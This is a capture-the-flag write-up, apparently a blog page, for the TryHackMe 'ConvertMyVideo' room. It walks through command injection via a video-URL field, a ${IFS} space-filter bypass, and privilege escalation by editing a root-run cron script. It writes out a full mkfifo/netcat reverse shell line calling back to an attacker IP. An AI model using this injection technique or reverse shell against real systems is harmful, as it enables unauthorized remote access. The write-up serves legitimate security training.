ConvertMyVideo

https://tryhackme.com/room/convertmyvideo

User Flag

As usually let's start with a nmap scan.

We see there are only two open ports (22, 80). Let's head to port 80.

We see there's a basic video convertor. After using gobuster we found a restricted /admin/ folder, we failed to brute force it so let's move on.

Let's check the js.

Nothing fancy. It adds what we enter on the field to the end of the url. Let's use burp suit and see if we can do something with it.

We could try command injection and see if it works.

The basic "whoami" didn't work so let's try payloads from the list below and see if we get lucky.

LogoGitHub - payloadbox/command-injection-payload-list: 🎯 Command Injection Payload ListGitHub

After a few tries we could get some output with ;command;

We can assume there's a space filtering, let's see how we can bypass it.

If we add ${IFS} we see it works.

Now that we now how to bypass the space filtering we can create a reverse shell file, start an http server and upload that rev shell to the victim machine.

The content of the rev.sh file will be:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.11.36.103 9001 >/tmp/f

Once we upload the file we have to change its perms.

No we can execute it and get a shell (Don't forget to start a nc listener)

We're in. Grab the flag.

Root Flag

After looking around we find credentials to the /admin/ page we mentioned earlier.

We can crack the hash or use hydra against the restricted form. Let's check what's inside that folder.

There's just one button that removes the downloads.

Checking the content of the /tmp/ folder we see there's a little script named "clean.sh".

Let's see if there's any cronjob on that file.

No cronjob running apparently. Maybe the SUID.

Nothing. We can try to check the running processes to see if we find anything useful.

We see there's a cron process running. We can use pspy to get more info about it. Let's upload a copy of pspy64 to the victim machine.

We see that "clean.sh" is being executed every few minutes by root. Let's edit the script and add a reverse shell.

Change the permissions.

And after a few seconds we get a root shell. Grab the flag and we're done.

PreviousCMesSNextVulnNet: Dotpy

Last updated

Was this helpful?